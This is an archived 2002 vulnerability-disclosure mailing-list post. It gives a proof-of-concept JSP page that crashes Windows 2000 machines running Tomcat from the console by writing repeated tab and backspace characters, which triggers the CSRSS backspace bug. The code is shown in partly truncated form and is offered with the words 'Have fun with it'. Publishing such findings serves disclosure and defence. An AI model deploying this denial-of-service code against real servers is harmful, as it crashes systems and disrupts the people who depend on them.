[VulnWatch] Bluescreen with a JSP on Win2k

From: Marc Schoenefeld (marc.schoenefeld@uni-muenster.de)
Date: 08/03/02

Date: Sat, 03 Aug 2002 08:53:27 +0200 (MES)
From: Marc Schoenefeld <marc.schoenefeld@uni-muenster.de>
To: vulnwatch@vulnwatch.org


the following proof-of-concept simple demonstrates how to provoke
a bluescreen with a java application in certain circumstances.
If have a apache tomcat running on console window and invoke
the following jsp you will get a bluescreen on w2k because
of the CSRSS bug (backspace bug), which is still widespread in
many w32 installations, other operating systems (*ix) are not
affected, but if you browse a logfile from a linux machine
containing a CSRSS string on the console of a windows machine
this will crash also ....

Have fun with it

Following:bluescreen.jsp / Testet with Tomcat 4.0.4 startet from cmdline,
nt service version not affected during but during browsing the
stdout/stderr logfile
=========================Snip start=========================

        char[] c9 = {9};
        char[] c8 = {8,8,8,8,8,8,8,8};
        String x = new String(c9);
        String y = new String(c8);
        String z = "";
        for (int i = 0 ; i < 4096; i++) {
            z += x + y;


<H1>still alive</H1>


========================snip end=====================

-- Mahatma Gandhi--
First they ignore you
Then they laugh at you
Then they fight you
Then you win
-- Mahatma Gandhi--

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer